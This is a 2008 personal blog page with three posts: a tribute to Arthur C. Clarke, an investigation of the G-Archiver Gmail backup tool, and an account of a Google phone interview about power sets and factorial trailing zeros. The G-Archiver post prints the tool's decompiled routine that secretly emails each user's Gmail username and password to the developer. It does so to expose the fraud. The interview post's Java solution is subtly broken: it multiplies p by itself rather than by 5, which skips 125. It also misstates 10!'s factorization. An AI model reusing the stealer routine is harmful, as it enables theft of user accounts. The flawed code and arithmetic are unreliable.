Tuesday, March 18, 2008

Arthur C. Clarke: 90 Orbits Around The Sun (1917-2008)

Well, I guess this is something that we should get used to: Living in a world without our heroes. This year, Robert James Fischer, a hero of childhood died, and now it is Arthur Clarke, who died today(19 March 1:30am Sri Lanka local time) at the Apollo Hospital in Colombo, Sri Lanka.

Sir Arthur Clarke was a writer (among other things), whose work we have hard time classifying. Was he a fiction writer? He could be, because he wrote about computers with human intelligence, extra-terrestrial worlds, different living species and so on. Was he writer and a technology popularizer? He could be since he write about computers, space expeditions, wireless communications and being a step ahead from his time, predicted the man on the moon by 1970, the invention of satellites and so many other. His "Space Odyssey", 'featuring' the HAL supercomputer (actually a wordplay of IBM, if you shift by one the letters), was directed by Stanley Kubrick and is one of the kind in science fiction films.

However, my favorite was by far "The Sentinel", a short passage that I read years ago. It is a about an artifact that astronauts discover in Moon and bring to Earth, but the humans cannot decode what it is, only that it constantly transmits a "beep" over the universe. They want to analyze the artifact but it resists until nuclear power is used to crack it open. "Now its signals have ceased, and those whose duty it is will be turning their minds upon Earth. Perhaps they wish to help our infant civilization. But they must be very, very old, and the old are often insanely jealous of the young...Now we should wait them to come..." The artifact was put there by an extra terrestrial civilization to warn them for the development of intelligence in this little promising planet, called Earth! If someone could make it stop, he must be intelligent enough to manage powers such as the nuclear. Brilliant and thrilling!

It is weird enough that Clarke was born nearly at the time Jules Verne, another writer of his kind, who envisioned space and underwater travels with spaceships and submarines, passed away. He lived for the last 50 years of his life in Sri Lanka and since 1989 needed to use wheel chair since he was diagnosed with post-polio syndrome.


Recently, approaching the age of 90, or as he humorously says "completing the 90th orbit around the sun", Clarke created a moving goodbye video for all of his fans. You can find it also in Youtube here. He prefers to be remembered as a writer and his last words on the video are from Rudyard Kipling's, "The Books I Leave Behind",

If I have given you delight
By aught that I have done,
Let me lie quiet in that night
Which shall be yours anon:
And for that little, little span
The dead are borne in mind
Seek not to question other than
The books I leave behind.

Saturday, March 8, 2008

A Gmail Passwords Theft Story

No talk about technologies. Not this time. Now, a little course on programming ethics using a real life experience.

I was roaming the web, together with Mrs. Insomnia, early in the morning when I read a story of programming horror. It was talking about a malicious software application that stole Gmail accounts. You can found it in this Coding Horror blog post. Having nothing better to do I decided to verify the story and see for myself what was going on.

To begin with, there was this guy with the codename "John Terry" (John Terry is actually a football player, Chelsea's skipper and Chelsea is not only Hillary Clinton's daughter but also a football club in England), who developed an application called G-Archiver. This application can be found on popular software hosting sites like brothersoft.com. Anyway, what this terrific application does, is to back up your Gmail account to a local drive. Of course at some time you have to enter your Gmail account details, aka the username and the password. Well, the troubles begin here, because it seems that the developer has hardcoded into the application, a routine that sends the Gmail account details of the users to his own! So, every time a user enters his information, an e-mail is sent to the wise-guy, of course with a copy of the account information. If he is not a malicious password thief, this guy must be a mail spam mazochist.

Fortunately, a programmer who used the software, reverse-engineered G-Archiver (written in .NET). I can imagine his surprise when he found out what was going on. The Gmail account details of the malicious developer were there and he used them to login into his account. The picture shows exactly this. There were about 2000 e-mails waiting for him, that were all stolen Gmail usernames and passwords from other users. Now there is a name Pawel Lesnikowski at the developer's contacts. If you Google search for the name, you will jump onto a site with .NET libraries and applications. Remember the name for later (see Update #2 at end of post)

Now we should make our own investigation and take it a little further. For the fun and to verify the story, I downloaded and installed G-Archiver. The application uses two libraries: Mail.dll and SM.dll both written for .NET. I opened them with Reflector and first checked out the Mail.dll library, which is a mail lib from lesnikowski.com. From a quick search I couldn't find anything suspicious in this assembly and seems like a helper library. Maybe our guy just used this library for his purpose. And maybe our wise-guy sent a mail to Lesnikowski and that's why he appeared in his contacts. (see Update #2)

Now to the creepy clue when I slice-opened the SM.dll assembly there was in front of me a function called CheckConnection(). What is its cause? For sure it does not check for the user connection. You probably have guessed right! It sends the users' account details of course! On the right it is the function disassembled by Reflector. Just a parenthesis: These guys were so amateurs that didn't even use an obfuscator to cover up their trails. Anyway, if you cannot view it well here is the code:

MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
//Message body contains username and password....
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword
: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
//Enter the wise-guys account details...
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "*******");
client.Port = 0x24b;

client.Host = "smtp.gmail.com";
client.EnableSsl = true;
//...and send the mail
client.Send(message);

And the user's Gmail credentials are stolen with high priority! As you can see, I have hidden the guy's gmail account password, not to protect him, but to protect his users, the ones that trusted his application. After all, there are thousands of Gmail accounts inside and most of them might be still active. Now there is a company associated with the software called MateMedia Inc. And also the sad story is that if you Google search for "gmail backup" the software site (garchiver.com) appears in the second page of the results! Too bad..

As the Coding Horror's writer correctly points out, these kinds of incidents hurt the trust of people with professional application developers. However, developers also discovered and exposed this fraud. It is a race in which all developers participate. Ad infinitum or while(true)..

Update #1: As I heard the company posted on their site that this piece of code was for testing and it was not removed, as it had to, for release. :) Yeah, right..

Update #2: As I wrote in the initial post, there was nothing suspicious in the Lesnikowski mail library and that the G-Arhiver developer possibly used it and at some point wrote an e-mail to him. It turns out that this actually happened, after I received an e-mail from Pawel Lesnikowski stating in addition that they abused his work without acquiring a license and that they contacted him having questions about his Mail.dll library. I therefore feel obliged to make some minor changes to the original post. His work can be found at lesnikowski.com site.

Sunday, March 2, 2008

Google Interviews Part V - Just Two More Questions

This is the last part of posts describing my own experience interviewing with Google. You may find the first interview here and then follow the traces until this last one.

Time had already passed (almost a month) after three successive interviews with Google and this last one was most probably the critical one. I did not prepare for this as much as the previous. The whole thing tires you up and at some point it seems better to relax and concentrate on the psychology rather than the technical stuff.

I was only asked two technical questions, and since my language of choice was Java the interviewer wanted to see some Java code for the answers. In summary, this interview was perfect. While in all previous interviews, mostly the first and the second, I had some important flaws in my performance, but this one was different. And all this because I was playing in my field.

Google at some point asks for a CV. However, the way I see it, Google and other major software companies search always for something unconventional in the candidate's application. You could say of course you know 5 or 10 programming languages, or that you can build an internet spider in 1 minute, however there might be some knowledge you have, that is somewhat rare and hence you should mention. In my case, this is Number Theory.

For me, number theory is a passion that has not passed over time. It was love in the first sight, when I became aware of it, maybe at the age of 15 or so, and from that time it was the field mathematics that I was really feeling comfortable with. Anyway, it is not hard to see why it has been named as the "Queen Of Mathematics". First, it is very easy to grasp the basics (primes, divisors etc) since they are inherently tractable by the human brain. After all, every human being starts my learning how to count, which is the first step of the true intelligence, aka understanding that 5 ice creams and 5 cars, share something in common: that they are 5. This helps solving silly cases like, if I ate 5 ice creams and then I ate 1 more, how many did I eat? There is no need to think of ice creams, nor the eating process. All you have to do is to construct the proper model for this situation: use natural numbers and solve 5+1.

Another great thing with number theory, is that your 'lab' can be a blank piece of paper. You can argue that 15 is divisible by 3, but all you need is a paper to perform the division. While a physicist might say that in light speeds some hypo-atomic elements, called mambojambions, are created, he still needs a gigantic, CERN-like laboratory to test his theories.

Anyway, I myself was raised in a Pythagorean culture(numbers are holy) and so I claimed in my CV to know some number theory stuff. Although I was a little worried if I would be able to defend such claims (after I would be talking to Google), it soon proved to be a wise decision. Both in phone and on site interviews with Google, there was no better time for me than doing number theory. And to much of my surprise, and despite that Google's name is inspired by a natural number (or a unit of measure if you wish), all the 'Googlers' that I spoke and met with, did lack elementary knowledge on the field. This time, (I assume) the interviewer had dug in my profile and wanted to see for himself. Every question and conversation was related to Number Theory.

So, the first question was about sets: "Create a function, called powerSet(), that will output the power set of the input set." The power set in Algebra theory is the set of all subsets of a set (no..bull-set!) If a set has N elements then the power set will have 2^N elements. So if a set is denoted by {a,b} with a,b as elements then the power set is { {},{a},{b},{a,b} }.
The {} is the empty set. Note that all elements of the power set are sets. Recursion can help for solving this problem. If for example the powerSet function can produce power sets for sets that have at most N elements how should we solve for the N+1 case?

If we denote sets with capital letters and the initial set as A, we can use the following algorithm
1. define B set initially empty
2.
a = extract one element from A
3. add powerSet(A) to B
4. for every set in B, say X, add a, and then add it to B
5. return B

Making the proper checks, this yields a function that can produce the power set of a set. For the Java case you can use the java.util.Set interface to write the code. I was asked to write the Java code but not asked any further questions, like complexity, runtime and so on. So we moved to the next and final question.

This was: "Create a function, called findZeros(), that will compute the number of zeros in the decimal representation of n!". Now this is interesting and despite seemingly easy it has subtle points. For example, 5! = 1.2.3.4.5= 120 has one zero and 10! = 1.2.3.4.5.6.7.8.9.10 = 3628800 and has two zeros. Now the obvious answer is to produce this C-style pseudo code:

int findZeros(int n) {
z<-0;
N<- n!

while ( N%10==0) { z++; N/=10;}
return z;
}

It seems right but has a terrible flaw: it fails at very 'small' values of n, in our 4-byte world, for n=15. Using some Java code like below, we can verify this case.

int n=1,i=2,m=1;
while(n>=m) {
m=n; n*=i;
System.out.println("Previous value "+m+" Current value "+n+" Counter "+i);
i++; }

System.out.println("OOPS! Overflow!");

So, if our code works only for 14 cases, it is pretty much useless. We should do better than that.
For number theory geeks, like myself, this means show time! The equation below is called the Legendre's formula
and basically computes the factorization of
n!. The exponent in which prime p is 'participating' in the factorization is the sum in the figure. Now, we should use it for our case. 10 is the product 2x5. So, the exponents of 2 and 5 in the factorization of n! defines how many zeros we get. For example, 10! = 1.2.3.4.5.6.7.8.9.10 = (2^8).(3^3).(5^2).7 So 2 is found 8 times and 5 is found 2 times in the factorization, hence if we pair up the 2's and 5's we get two zeros. Now, there are obviously more 2's than 5's in the expansion so finally we have to answer at the question:
What is the exponent of 5 in the factorization of n!?
Based on the reasoning above this is equal to the number of zeros of n!.
Based on Legendre's formula we have to calculate:
[n/5]+[n/5^2]+[n/5^3]+... to infinite. This is done for example by the following Java code

calculateZeros(int n) {
int s=0,r,p=5;
while((r=(n/p)) !=0)

{s+=r;
p*=p;}

System.out.println(n+"! has "+s+" zero"+((s==1)?"":"s"));
}

For example, 25 = 1.2.3....23.24.25 = 15511210043330985984000000. Running the above code will produce the message 25! has 6 zeros. Instead of messing with a number with 26 digits (25!) you only have to deal with the number 25. Why?

In the sum S(n) = [n/5]+[n/5^2]+[n/5^3]... the first term, [n/5], computes how many numbers up to n are multiples of 5. For the 25 case there are 5 of them: 5,10,15,20,25. The second computes all multiples of 25, i.e. only one. The third and all others are zero. A number that in its factorization, the prime 5 is in the power of k, e.g. 10 = 2.5 and k=1 or 25 = 5^2 and k=2, participates in the first k terms of the sum by adding one to each term. Hence its overall contribution is k, hence the sum S(n) calculates the power of 5 in the factorization of n!, and therefore the number of zeros in the decimal representation, Q.E.D.

That was it! There is no other way to handle such big values and the solution can deal with really gigantic numbers without explicit calculation. The interviewer had elementary number theoretic knowledge but was able to follow the reasoning and we had a very nice conversation after that. He seemed to be fond of such mathematical tricks as the one we dealt with.

In summary, I think this was the interview question that booked me the plane ticket to fly to the Google site. I was very satisfied after we hang up and I was impatient for the outcome but deep inside I was sure it was an ideal interview session and that my chances were great. The next morning I received a phone call from Google inviting me for the on site interviews. Mission was accomplished.

This post ends a series of posts in which I wrote about my phone interviews with Google along with many interview questions. For the on site interviews I am bound to an NDA so maybe I will post them encrypted! That's all for now about Google interview questions. Until, I come back for the on site experience remember a small tribute to Number Theory:
"Die ganzen Zahlen hat der liebe Gott gemacht, alles andere ist Menschenwerk" (Numbers were created by good Lord. Everything else is human's work-Leopold Kronecker)